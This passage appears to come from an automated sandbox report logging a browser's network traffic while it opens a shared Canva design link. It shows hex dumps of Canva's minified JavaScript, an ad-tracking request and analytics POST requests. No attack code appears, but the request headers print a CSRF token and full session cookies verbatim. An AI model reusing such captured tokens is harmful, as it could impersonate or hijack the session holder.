                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC1190INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 39 31 39 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 36 35 33 34 32 35 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[8919],{/***/ 653425:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC1369INData Raw: 48 26 26 76 6f 69 64 20 30 21 3d 3d 6c 2e 65 6c 65 6d 65 6e 74 2e 4e 7c 7c 22 69 6e 74 72 6f 22 3d 3d 3d 6d 2e 48 26 26 76 6f 69 64 20 30 21 3d 3d 6c 2e 65 6c 65 6d 65 6e 74 2e 4e 61 3f 7b 2e 2e 2e 6d 2c 48 3a 22 63 6f 6e 74 69 6e 75 6f 75 73 22 7d 3a 6d 29 29 29 3b 66 26 26 63 2e 70 75 73 68 28 45 31 28 66 29 29 3b 66 3d 7b 7d 3b 30 3c 64 2e 64 75 72 61 74 69 6f 6e 26 26 28 66 2e 4b 3d 7b 73 74 61 72 74 3a 30 2c 65 6e 64 3a 64 2e 64 75 72 61 74 69 6f 6e 7d 29 3b 30 3c 65 2e 64 75 72 61 74 69 6f 6e 26 26 28 66 2e 46 3d 7b 73 74 61 72 74 3a 62 2d 65 2e 64 75 72 61 74 69 6f 6e 2c 65 6e 64 3a 62 7d 29 3b 63 2e 70 75 73 68 28 66 29 3b 63 6f 6e 73 74 20 7b 4b 3a 67 2c 46 3a 68 2c 63 6f 6e 74 69 6e 75 6f 75 73 3a 6b 7d 3d 63 2e 72 65 64 75 63 65 28 28 6c 2c 6d
                                                                                                                                                                                                                                                    Data Ascii: H&&void 0!==l.element.N||"intro"===m.H&&void 0!==l.element.Na?{...m,H:"continuous"}:m)));f&&c.push(E1(f));f={};0<d.duration&&(f.K={start:0,end:d.duration});0<e.duration&&(f.F={start:b-e.duration,end:b});c.push(f);const {K:g,F:h,continuous:k}=c.reduce((l,m
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC1369INData Raw: 2e 64 2c 0a 2e 2e 2e 63 28 64 29 2c 63 68 69 6c 64 72 65 6e 3a 64 2e 63 68 69 6c 64 72 65 6e 26 26 76 65 62 28 64 2e 63 68 69 6c 64 72 65 6e 29 7d 3b 63 61 73 65 20 22 72 65 63 74 22 3a 72 65 74 75 72 6e 7b 2e 2e 2e 64 2c 2e 2e 2e 63 28 64 29 2c 66 69 6c 6c 3a 64 2e 66 69 6c 6c 26 26 62 28 64 2e 66 69 6c 6c 29 7d 3b 63 61 73 65 20 22 73 68 61 70 65 22 3a 72 65 74 75 72 6e 7b 2e 2e 2e 64 2c 2e 2e 2e 63 28 64 29 2c 41 6a 3a 64 2e 41 6a 26 26 5f 5f 63 2e 47 65 28 64 2e 41 6a 2c 65 3d 3e 62 28 65 29 29 7d 3b 63 61 73 65 20 22 74 65 78 74 22 3a 72 65 74 75 72 6e 7b 2e 2e 2e 64 2c 2e 2e 2e 63 28 64 29 2c 74 71 3a 64 2e 74 71 26 26 7b 4f 3a 64 2e 74 71 2e 4f 26 26 5f 5f 63 2e 47 65 28 64 2e 74 71 2e 4f 2c 65 3d 3e 28 7b 6f 70 61 63 69 74 79 3a 65 2e 6f 70 61 63
                                                                                                                                                                                                                                                    Data Ascii: .d,...c(d),children:d.children&&veb(d.children)};case "rect":return{...d,...c(d),fill:d.fill&&b(d.fill)};case "shape":return{...d,...c(d),Aj:d.Aj&&__c.Ge(d.Aj,e=>b(e))};case "text":return{...d,...c(d),tq:d.tq&&{O:d.tq.O&&__c.Ge(d.tq.O,e=>({opacity:e.opac
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC1369INData Raw: 6f 6e 3a 61 2e 64 55 2c 72 65 73 6f 75 72 63 65 5f 61 6c 72 65 61 64 79 5f 6c 6f 61 64 65 64 3a 61 2e 24 32 61 2c 70 65 72 66 6f 72 6d 61 6e 63 65 5f 63 6f 6e 74 65 78 74 3a 6e 75 6c 6c 3d 3d 61 2e 67 6d 3f 76 6f 69 64 20 30 3a 5f 5f 63 2e 4f 43 28 61 2e 67 6d 29 2c 65 64 69 74 69 6e 67 5f 63 6f 6e 74 65 78 74 3a 6e 75 6c 6c 3d 3d 61 2e 45 72 3f 76 6f 69 64 20 30 3a 5f 5f 63 2e 78 75 28 61 2e 45 72 29 7d 29 7d 7d 3b 5f 5f 63 2e 41 34 61 3d 63 6c 61 73 73 7b 69 6e 69 74 69 61 6c 69 7a 65 28 29 7b 7d 70 61 67 65 28 61 29 7b 63 6f 6e 73 6f 6c 65 2e 67 72 6f 75 70 43 6f 6c 6c 61 70 73 65 64 28 60 5b 43 6f 6e 73 6f 6c 65 41 6e 61 6c 79 74 69 63 73 43 6c 69 65 6e 74 5d 3a 20 24 7b 61 7d 20 70 61 67 65 20 76 69 65 77 20 74 72 61 63 6b 65 64 60 29 3b 43 31 28 7b
                                                                                                                                                                                                                                                    Data Ascii: on:a.dU,resource_already_loaded:a.$2a,performance_context:null==a.gm?void 0:__c.OC(a.gm),editing_context:null==a.Er?void 0:__c.xu(a.Er)})}};__c.A4a=class{initialize(){}page(a){console.groupCollapsed(`[ConsoleAnalyticsClient]: ${a} page view tracked`);C1({
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC1369INData Raw: 73 74 6f 72 65 2e 69 5a 61 2c 6e 6f 64 65 52 65 66 3a 74 68 69 73 2e 6e 6f 64 65 52 65 66 2c 63 68 69 6c 64 72 65 6e 3a 65 3d 3e 7b 76 61 72 20 66 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 5f 5f 63 2e 78 65 3f 21 5f 5f 63 2e 78 65 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 43 72 69 4f 53 2f 67 69 29 3a 21 31 3b 72 65 74 75 72 6e 20 4a 31 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 4b 31 28 22 4d 62 6b 49 6d 67 22 2c 7b 52 44 54 53 64 77 3a 66 7d 29 2c 0a 73 74 79 6c 65 3a 7b 2e 2e 2e 28 64 26 26 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 64 3f 22 74 72 61 6e 73 66 6f 72 6d 20 33 30 30 6d 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 2c 20 6f 70 61 63 69 74 79 20 33 30 30 6d 73 20 65 61 73 65 2d 69 6e 22 3a 76 6f 69 64 20 30
                                                                                                                                                                                                                                                    Data Ascii: store.iZa,nodeRef:this.nodeRef,children:e=>{var f="undefined"!==typeof __c.xe?!__c.xe.userAgent.match(/CriOS/gi):!1;return J1("div",{className:K1("MbkImg",{RDTSdw:f}),style:{...(d&&{transition:d?"transform 300ms ease-in-out, opacity 300ms ease-in":void 0
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC1369INData Raw: 6f 70 73 2e 41 37 2c 69 63 6f 6e 3a 62 3f 28 29 3d 3e 4a 31 28 5f 5f 63 2e 46 55 2c 7b 73 69 7a 65 3a 22 6d 65 64 69 75 6d 22 2c 74 6f 6e 65 3a 22 73 65 63 6f 6e 64 61 72 79 22 7d 29 3a 76 6f 69 64 20 30 2c 61 72 69 61 4c 61 62 65 6c 3a 63 2c 63 68 69 6c 64 72 65 6e 3a 21 62 26 26 63 7d 29 2c 6c 3d 74 68 69 73 2e 70 56 3f 5b 6b 2c 68 5d 3a 5b 68 2c 6b 5d 3b 72 65 74 75 72 6e 20 4a 31 28 5f 5f 63 2e 74 76 2c 7b 79 6c 3a 22 64 61 72 6b 22 2c 6c 69 67 68 74 3a 22 64 61 72 6b 22 2c 63 68 69 6c 64 72 65 6e 3a 6d 3d 3e 46 65 62 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 4b 31 28 7b 5f 35 73 45 64 45 51 3a 68 7c 7c 6b 2c 61 6e 62 7a 37 67 3a 21 21 66 2c 61 73 4f 30 38 41 3a 74 68 69 73 2e 70 56 7d 2c 6d 2e 63 6c 61 73 73 4e 61 6d 65 2c 22 6e 63 48 33
                                                                                                                                                                                                                                                    Data Ascii: ops.A7,icon:b?()=>J1(__c.FU,{size:"medium",tone:"secondary"}):void 0,ariaLabel:c,children:!b&&c}),l=this.pV?[k,h]:[h,k];return J1(__c.tv,{yl:"dark",light:"dark",children:m=>Feb("div",{className:K1({_5sEdEQ:h||k,anbz7g:!!f,asO08A:this.pV},m.className,"ncH3
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC1369INData Raw: 6f 69 64 20 30 3a 62 2e 67 65 74 28 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 7c 7c 30 3c 0a 61 7d 67 65 74 20 6f 71 28 29 7b 76 61 72 20 61 3b 69 66 28 30 3c 74 68 69 73 2e 61 48 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 61 3d 74 68 69 73 2e 59 49 5b 74 68 69 73 2e 61 48 2d 31 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 70 61 67 65 7d 67 65 74 20 6e 65 78 74 50 61 67 65 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 61 48 3b 69 66 28 2d 31 3c 61 26 26 61 3c 74 68 69 73 2e 59 49 2e 6c 65 6e 67 74 68 2d 31 29 72 65 74 75 72 6e 20 61 3d 74 68 69 73 2e 59 49 5b 61 2b 31 5d 2c 74 68 69 73 2e 6f 6a 61 28 61 29 3f 61 2e 70 61 67 65 3a 76 6f 69 64 20 30 7d 67 65 74 20 64 75 72 61 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 61 3d 74
                                                                                                                                                                                                                                                    Data Ascii: oid 0:b.get();return null==a||0<a}get oq(){var a;if(0<this.aH)return null===(a=this.YI[this.aH-1])||void 0===a?void 0:a.page}get nextPage(){var a=this.aH;if(-1<a&&a<this.YI.length-1)return a=this.YI[a+1],this.oja(a)?a.page:void 0}get duration(){const a=t
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC1369INData Raw: 3d 3e 7b 74 68 69 73 2e 69 73 56 69 73 69 62 6c 65 28 74 29 26 26 6e 2e 70 75 73 68 28 75 29 7d 29 7d 65 6c 73 65 20 6e 2e 70 75 73 68 28 71 29 7d 29 3b 72 65 74 75 72 6e 20 6e 7d 2c 7b 65 71 75 61 6c 73 3a 5f 5f 63 2e 41 65 62 2e 73 68 61 6c 6c 6f 77 7d 29 3b 74 68 69 73 2e 75 70 64 61 74 65 3d 28 29 3d 3e 7b 63 6f 6e 73 74 20 6c 3d 74 68 69 73 2e 54 61 2e 6e 6f 77 28 29 2c 6d 3d 6e 75 6c 6c 21 3d 74 68 69 73 2e 48 56 3f 28 6c 2d 74 68 69 73 2e 48 56 29 2a 74 68 69 73 2e 70 6c 61 79 62 61 63 6b 52 61 74 65 3a 0a 30 3b 74 68 69 73 2e 70 6c 61 79 69 6e 67 26 26 28 74 68 69 73 2e 56 45 26 26 74 68 69 73 2e 52 76 2b 6d 3e 3d 74 68 69 73 2e 56 45 3f 28 74 68 69 73 2e 52 76 3d 74 68 69 73 2e 56 45 2c 74 68 69 73 2e 56 45 3d 76 6f 69 64 20 30 2c 74 68 69 73 2e
                                                                                                                                                                                                                                                    Data Ascii: =>{this.isVisible(t)&&n.push(u)})}else n.push(q)});return n},{equals:__c.Aeb.shallow});this.update=()=>{const l=this.Ta.now(),m=null!=this.HV?(l-this.HV)*this.playbackRate:0;this.playing&&(this.VE&&this.Rv+m>=this.VE?(this.Rv=this.VE,this.VE=void 0,this.
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC581INData Raw: 29 7d 29 29 3b 76 61 72 20 66 66 62 3d 5f 5f 63 2e 47 28 28 29 3d 3e 28 7b 7d 29 29 3b 76 61 72 20 67 66 62 3b 67 66 62 3d 63 6c 61 73 73 7b 62 57 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 7a 64 2e 65 78 65 63 28 74 68 69 73 2e 51 61 2e 73 65 72 76 69 63 65 4e 61 6d 65 2c 74 68 69 73 2e 51 61 2e 62 57 2c 62 66 62 2e 50 61 28 61 29 29 2e 74 68 65 6e 28 63 66 62 2e 52 61 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 29 7b 74 68 69 73 2e 7a 64 3d 61 3b 74 68 69 73 2e 51 61 3d 62 3b 74 68 69 73 2e 74 72 61 63 6b 3d 5f 5f 63 2e 6a 4d 28 7b 4a 64 3a 74 68 69 73 2e 7a 64 2c 73 65 72 76 69 63 65 4e 61 6d 65 3a 74 68 69 73 2e 51 61 2e 73 65 72 76 69 63 65 4e 61 6d 65 2c 6d 65 74 68 6f 64 4e 61 6d 65 3a 74 68 69 73 2e 51 61 2e 74 72 61 63 6b 2c 73 6d 3a
                                                                                                                                                                                                                                                    Data Ascii: )}));var ffb=__c.G(()=>({}));var gfb;gfb=class{bW(a){return this.zd.exec(this.Qa.serviceName,this.Qa.bW,bfb.Pa(a)).then(cfb.Ra)}constructor(a,b){this.zd=a;this.Qa=b;this.track=__c.jM({Jd:this.zd,serviceName:this.Qa.serviceName,methodName:this.Qa.track,sm:


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    88192.168.2.449842142.250.181.34443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:45 UTC1280OUTGET /ddm/fls/z/src=9812343;type=websi000;cat=flood0;ord=247230614;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=324257022;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a HTTP/1.1
                                                                                                                                                                                                                                                    Host: adservice.google.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:46 UTC529INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:46 GMT
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                    Content-Length: 42
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    2024-12-19 21:27:46 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    89192.168.2.449845104.16.103.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:46 UTC3259OUTPOST /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Content-Length: 1624
                                                                                                                                                                                                                                                    X-Canva-Brand: BAAAAAAAAAA
                                                                                                                                                                                                                                                    X-Canva-App: responsive_design_viewer
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    X-Canva-Build-Sha: e404dd6
                                                                                                                                                                                                                                                    X-Csrf-Token: Yzy1uD0I9GT_B9ypZbbQGK0r5qOlIcQ_PeqpudldO8IdMaoCmBoSvbrl3Hh6B9GL1gyOOuPINaA6kk4fV9uPuktO7bs
                                                                                                                                                                                                                                                    X-Canva-User: UAAAAAAAAAA
                                                                                                                                                                                                                                                    X-Canva-Analytics: AAQAA1dFQgAA
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                    X-Canva-Request: recordanalyticseventbatch
                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                    X-Canva-Locale: en
                                                                                                                                                                                                                                                    X-Canva-Build-Name: 20241217-21
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJ [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:46 UTC1624OUTData Raw: 7b 22 41 22 3a 5b 7b 22 41 3f 22 3a 22 44 22 2c 22 41 22 3a 7b 22 41 22 3a 22 37 33 61 39 30 31 39 66 2d 39 39 38 31 2d 34 62 35 61 2d 38 36 33 64 2d 65 62 38 35 34 34 62 63 61 61 32 63 22 2c 22 45 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 32 31 3a 32 37 3a 34 34 2e 35 38 33 5a 22 2c 22 46 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 32 31 3a 32 37 3a 34 34 2e 38 34 39 5a 22 2c 22 48 22 3a 22 65 6e 22 2c 22 49 22 3a 7b 22 41 22 3a 22 55 53 22 7d 2c 22 4a 22 3a 22 57 45 42 22 2c 22 4b 22 3a 7b 22 41 41 54 53 4f 22 3a 22 41 31 22 2c 22 57 4b 44 55 49 22 3a 22 41 22 2c 22 56 53 45 4d 4c 22 3a 22 43 22 2c 22 54 53 51 52 4c 22 3a 22 42 22 2c 22 54 4f 4d 4c 4f 22 3a 22 41 22 2c 22 53 45 4f 50 53 22 3a 22 43 22 2c 22 52 52 53 4e 43 22 3a 22 41 22 2c 22 52 52 53 43
                                                                                                                                                                                                                                                    Data Ascii: {"A":[{"A?":"D","A":{"A":"73a9019f-9981-4b5a-863d-eb8544bcaa2c","E":"2024-12-19T21:27:44.583Z","F":"2024-12-19T21:27:44.849Z","H":"en","I":{"A":"US"},"J":"WEB","K":{"AATSO":"A1","WKDUI":"A","VSEML":"C","TSQRL":"B","TOMLO":"A","SEOPS":"C","RRSNC":"A","RRSC
                                                                                                                                                                                                                                                    2024-12-19 21:27:47 UTC1073INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:47 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a876a22423e-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                    x-request-id: 8f4a7a876a22423e
                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fxLV%2FMk0UCT%2F1aSpcH6wg6JcKnP%2F%2FRamwOD2tcVRj6A%2FNCRxRvR8WAOwdhotPbyHzfE0kS9UcjwvV2JMzXTqAqVB9T6hQ2EEjefUFlXs%2BUpDV1fBhi7gOb4%2FlCmG%2FDU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:47 UTC28INData Raw: 31 36 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 7d 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 16'"])}while(1);</x>//{}
                                                                                                                                                                                                                                                    2024-12-19 21:27:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    90192.168.2.449846104.16.103.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:47 UTC2878OUTPOST /cdn-cgi/rum? HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Content-Length: 1740
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
